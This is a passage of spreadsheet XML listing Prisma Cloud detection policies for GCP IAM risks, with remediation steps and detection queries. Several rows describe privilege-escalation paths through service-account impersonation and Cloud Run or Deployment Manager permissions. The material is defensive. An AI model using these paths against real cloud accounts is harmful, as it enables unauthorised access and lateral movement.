      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3257" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3257" t="inlineStr">
        <is>
          <t>GCP VM instance with permissions to impersonate a service account</t>
        </is>
      </c>
      <c r="L3257" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3257" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3257" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3257" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3257" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3257" t="inlineStr"/>
      <c r="R3257" t="inlineStr"/>
      <c r="S3257" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3257" t="b">
        <v>1</v>
      </c>
      <c r="U3257" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3257" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3257" t="inlineStr">
        <is>
          <t>With access to iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs' permissions, an adversary can impersonate access to the service accounts, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3257"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5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57" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ('iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs')</t>
        </is>
      </c>
      <c r="AA3257" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3257" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3257" t="inlineStr"/>
      <c r="AD3257" t="b">
        <v>1</v>
      </c>
      <c r="AE3257" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3257" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>50fea644-dd5e-4f1f-8e01-a36f4a66fee4</t>
        </is>
      </c>
      <c r="AI3257" t="inlineStr">
        <is>
          <t>50fea644-dd5e-4f1f-8e01-a36f4a66fee4</t>
        </is>
      </c>
      <c r="AJ3257" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3257" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3258">
      <c r="A3258" t="inlineStr"/>
      <c r="B3258" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3258" s="2" t="inlineStr"/>
      <c r="D3258" t="inlineStr"/>
      <c r="E3258" t="inlineStr"/>
      <c r="F3258" t="inlineStr"/>
      <c r="G3258" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3258" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3258" t="inlineStr">
        <is>
          <t>GCP service accounts with permissions to deploy new resources</t>
        </is>
      </c>
      <c r="L3258" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3258" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3258" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3258" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3258" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3258" t="inlineStr"/>
      <c r="R3258" t="inlineStr"/>
      <c r="S3258" t="inlineStr"/>
      <c r="T3258" t="b">
        <v>0</v>
      </c>
      <c r="U3258" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3258" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3258" t="inlineStr">
        <is>
          <t>This policy identifies permissions to deploy new resources that is defined as risky permissions. Ensure that the GCP service account entities provisioned in your GCP environment don't have a risky set of write permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3258" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization/folder/project
 3. Navigate to the IAM service
 4. Find the binding between the service account  and the role with permissions to deploy new resources
 5. Remove the binding
 6. Create a new binding with a privileged predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y3258" t="inlineStr"/>
      <c r="Z3258" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and grantedby.cloud.entity.type = 'service account' and action.name = 'deploymentmanager.deployments.create'</t>
        </is>
      </c>
      <c r="AA3258" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3258" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3258" t="inlineStr"/>
      <c r="AD3258" t="b">
        <v>1</v>
      </c>
      <c r="AE3258" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3258" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>5c556a50-bbdf-4baa-bf0b-24a86ddb6bde</t>
        </is>
      </c>
      <c r="AI3258" t="inlineStr">
        <is>
          <t>5c556a50-bbdf-4baa-bf0b-24a86ddb6bde</t>
        </is>
      </c>
      <c r="AJ3258" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3258" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3259">
      <c r="A3259" t="inlineStr"/>
      <c r="B3259" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3259" s="2" t="inlineStr"/>
      <c r="D3259" t="n">
        <v>0</v>
      </c>
      <c r="E3259" t="n">
        <v>596</v>
      </c>
      <c r="F3259" t="n">
        <v>0</v>
      </c>
      <c r="G3259" t="b">
        <v>1</v>
      </c>
      <c r="H3259"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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3259" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3259" t="inlineStr">
        <is>
          <t>GCP VM instance with permissions over Deployments Manager</t>
        </is>
      </c>
      <c r="L3259" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3259" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3259" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3259" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3259" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3259" t="inlineStr"/>
      <c r="R3259" t="inlineStr"/>
      <c r="S3259" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3259" t="b">
        <v>1</v>
      </c>
      <c r="U3259" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3259" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3259" t="inlineStr">
        <is>
          <t>This IAM policy empowers stringent oversight over pivotal functions within Google Cloud's 'compute' service, exclusively targeting 'Instances' resources. It effectively governs the critical actions involved in managing deployments through Deployment Manager, ensuring a robust defense against unauthorized alterations. By orchestrating deploymentmanager.deployments.create and deploymentmanager.deployments.update capabilities, this policy enforces meticulous control over resource creation and updates, guarding against potential internet exposure, privilege escalation, or lateral movements. This heightened control fortifies the security of your GCP VM instances with heightened vigilance over Deployment Manager functionalities.</t>
        </is>
      </c>
      <c r="X3259"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5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59" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ('deploymentmanager.deployments.create', 'deploymentmanager.deployments.update')</t>
        </is>
      </c>
      <c r="AA3259" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3259" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3259" t="inlineStr"/>
      <c r="AD3259" t="b">
        <v>1</v>
      </c>
      <c r="AE3259" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3259" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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59" t="inlineStr">
        <is>
          <t>de4f6073-4869-4c2e-961c-6fa33eef0b2a</t>
        </is>
      </c>
      <c r="AI3259" t="inlineStr">
        <is>
          <t>de4f6073-4869-4c2e-961c-6fa33eef0b2a</t>
        </is>
      </c>
      <c r="AJ3259" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3259" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3260">
      <c r="A3260" t="inlineStr"/>
      <c r="B3260" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3260" s="2" t="inlineStr"/>
      <c r="D3260" t="inlineStr"/>
      <c r="E3260" t="inlineStr"/>
      <c r="F3260" t="inlineStr"/>
      <c r="G3260" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3260" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3260" t="inlineStr">
        <is>
          <t>GCP IAM effective permissions are over-privileged (7 days)</t>
        </is>
      </c>
      <c r="L3260" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3260" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3260" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3260" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3260" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3260" t="inlineStr"/>
      <c r="R3260" t="inlineStr"/>
      <c r="S3260" t="inlineStr"/>
      <c r="T3260" t="b">
        <v>1</v>
      </c>
      <c r="U3260" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3260" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3260" t="inlineStr">
        <is>
          <t>This policy identifies GCP IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3260" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the IAM service
3. Find the binding between the service account or the user and the role with over-privileged permissions
5. Remove the binding
6. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y326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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and action.lastaccess.days &gt; 7</t>
        </is>
      </c>
      <c r="AA3260" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3260" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3260" t="inlineStr"/>
      <c r="AD3260" t="b">
        <v>1</v>
      </c>
      <c r="AE3260" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3260" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>ca4807f0-2fb8-4af5-949a-bd677b1501cf</t>
        </is>
      </c>
      <c r="AI3260" t="inlineStr">
        <is>
          <t>ca4807f0-2fb8-4af5-949a-bd677b1501cf</t>
        </is>
      </c>
      <c r="AJ3260" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3260" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3261">
      <c r="A3261" t="inlineStr"/>
      <c r="B3261" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3261" s="2" t="inlineStr"/>
      <c r="D3261" t="n">
        <v>0</v>
      </c>
      <c r="E3261" t="n">
        <v>603</v>
      </c>
      <c r="F3261" t="n">
        <v>0</v>
      </c>
      <c r="G3261" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3261" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3261" t="inlineStr">
        <is>
          <t>GCP IAM effective permissions are over-privileged (90 days)</t>
        </is>
      </c>
      <c r="L3261" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3261" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3261" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3261" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3261" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3261" t="inlineStr"/>
      <c r="R3261" t="inlineStr"/>
      <c r="S3261" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3261" t="b">
        <v>1</v>
      </c>
      <c r="U3261" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3261" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3261" t="inlineStr">
        <is>
          <t>This policy identifies GCP IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3261" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the IAM service
3. Find the binding between the service account or the user and the role with over-privileged permissions
4. Remove the binding
5. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y326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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3261" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3261" t="inlineStr">
        <is>
          <t>2022-11-11 04:03:13</t>
        </is>
      </c>
      <c r="AC3261" t="inlineStr"/>
      <c r="AD3261" t="b">
        <v>1</v>
      </c>
      <c r="AE3261" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3261" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>7ee9fbb1-2e0c-47d2-b874-dea733148f04</t>
        </is>
      </c>
      <c r="AI3261" t="inlineStr">
        <is>
          <t>7ee9fbb1-2e0c-47d2-b874-dea733148f04</t>
        </is>
      </c>
      <c r="AJ3261" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3261" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3262">
      <c r="A3262" t="inlineStr"/>
      <c r="B3262" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3262" s="2" t="inlineStr"/>
      <c r="D3262" t="inlineStr"/>
      <c r="E3262" t="inlineStr"/>
      <c r="F3262" t="inlineStr"/>
      <c r="G3262" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3262" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3262" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3262" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3262" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3262" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3262" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3262" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3262" t="inlineStr"/>
      <c r="R3262" t="inlineStr"/>
      <c r="S3262" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3262" t="b">
        <v>0</v>
      </c>
      <c r="U3262" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3262" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3262" t="inlineStr">
        <is>
          <t>This policy identifies GCP Groups and Service Accounts with Stale IAM Effective Metadata Write Permissions.
Risk of Unused Metadata Write Permissions:
Unused GCP groups and service accounts with IAM effective Metadata Write permissions for 90 days pose a significant security threat because:
Unsecured Backdoor: These accounts act like forgotten backdoors with high-level access. If compromised, attackers can exploit them to directly modify or delete critical virtual machine (VM) configurations. This could potentially lead to complete VM compromise, unauthorized access to other resources, or disruption of critical services.
Information Gathering Tool: An attacker with access to these credentials could leverage them to gather sensitive details about your GCP environment. This information could include VM names, project IDs, or network configurations. Attackers could exploit this knowledge to identify further vulnerabilities or plan more targeted attacks.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused GCP groups and service accounts with any level of IAM effective Metadata access (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Metadata Write access required for a group or service account to function effectively. Evaluate if alternative methods, like service account keys or IAM conditions, can restrict access to specific VMs or projects.
Monitor for Unusual Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP groups and service accounts. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3262" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3262" t="inlineStr"/>
      <c r="Z3262" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3262" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3262" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3262" t="inlineStr"/>
      <c r="AD3262" t="b">
        <v>1</v>
      </c>
      <c r="AE3262" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3262" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>4c22366d-b282-4e7b-8481-5be75baa3dad</t>
        </is>
      </c>
      <c r="AI3262" t="inlineStr">
        <is>
          <t>4c22366d-b282-4e7b-8481-5be75baa3dad</t>
        </is>
      </c>
      <c r="AJ3262" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3262" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3263">
      <c r="A3263" t="inlineStr"/>
      <c r="B3263" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3263" s="2" t="inlineStr"/>
      <c r="D3263" t="inlineStr"/>
      <c r="E3263" t="inlineStr"/>
      <c r="F3263" t="inlineStr"/>
      <c r="G3263" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3263" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3263" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Cloud Run Jobs IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3263" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3263" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3263" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3263" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3263" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3263" t="inlineStr"/>
      <c r="R3263" t="inlineStr"/>
      <c r="S3263" t="inlineStr"/>
      <c r="T3263" t="b">
        <v>1</v>
      </c>
      <c r="U3263" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3263" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3263" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Run Jobs,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63" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'run.jobs.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3263" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3263" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3263" t="inlineStr"/>
      <c r="AD3263" t="b">
        <v>1</v>
      </c>
      <c r="AE3263" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3263" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>e6353326-77f7-4b5a-abdb-ede688ba3068</t>
        </is>
      </c>
      <c r="AI3263" t="inlineStr">
        <is>
          <t>e6353326-77f7-4b5a-abdb-ede688ba3068</t>
        </is>
      </c>
      <c r="AJ3263" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3263" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3264">
      <c r="A3264" t="inlineStr"/>
      <c r="B3264" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3264" s="2" t="inlineStr"/>
      <c r="D3264" t="inlineStr"/>
      <c r="E3264" t="inlineStr"/>
      <c r="F3264" t="inlineStr"/>
      <c r="G3264" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3264" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3264" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Cloud Run IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3264" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3264" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3264" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3264" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3264" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3264" t="inlineStr"/>
      <c r="R3264" t="inlineStr"/>
      <c r="S3264" t="inlineStr"/>
      <c r="T3264" t="b">
        <v>1</v>
      </c>
      <c r="U3264" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3264" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3264" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service.  by editing the IAM policy for Cloud Run instances, in conjunction with Service Account impersonation privileges they would be able to escalate their permissions by adding edit permissions to an instance, causing it to perform attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3264" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'run.services.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3264" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3264" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3264" t="inlineStr"/>
      <c r="AD3264" t="b">
        <v>1</v>
      </c>
      <c r="AE3264" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3264" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>b2678cef-2371-4129-9dc7-7e07669a4223</t>
        </is>
      </c>
      <c r="AI3264" t="inlineStr">
        <is>
          <t>b2678cef-2371-4129-9dc7-7e07669a4223</t>
        </is>
      </c>
      <c r="AJ3264" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3264" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3265">
      <c r="A3265" t="inlineStr"/>
      <c r="B3265" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3265" s="2" t="inlineStr"/>
      <c r="D3265" t="inlineStr"/>
      <c r="E3265" t="inlineStr"/>
      <c r="F3265" t="inlineStr"/>
      <c r="G3265" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3265" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3265" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Cloud Run Creation Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3265" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3265" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3265" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3265" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3265" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3265" t="inlineStr"/>
      <c r="R3265" t="inlineStr"/>
      <c r="S3265" t="inlineStr"/>
      <c r="T3265" t="b">
        <v>1</v>
      </c>
      <c r="U3265" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3265" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3265" t="inlineStr">
        <is>
          <t>An adversary able to create Cloud Run instances with Service Account impersonation privileges would be able to escalate their permissions creating an instance which performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3265" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'run.services.create', 'run.routes.invoke', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3265" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3265" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3265" t="inlineStr"/>
      <c r="AD3265" t="b">
        <v>1</v>
      </c>
      <c r="AE3265" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3265" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>c5e8d60e-108c-4383-983e-33b3dd468eff</t>
        </is>
      </c>
      <c r="AI3265" t="inlineStr">
        <is>
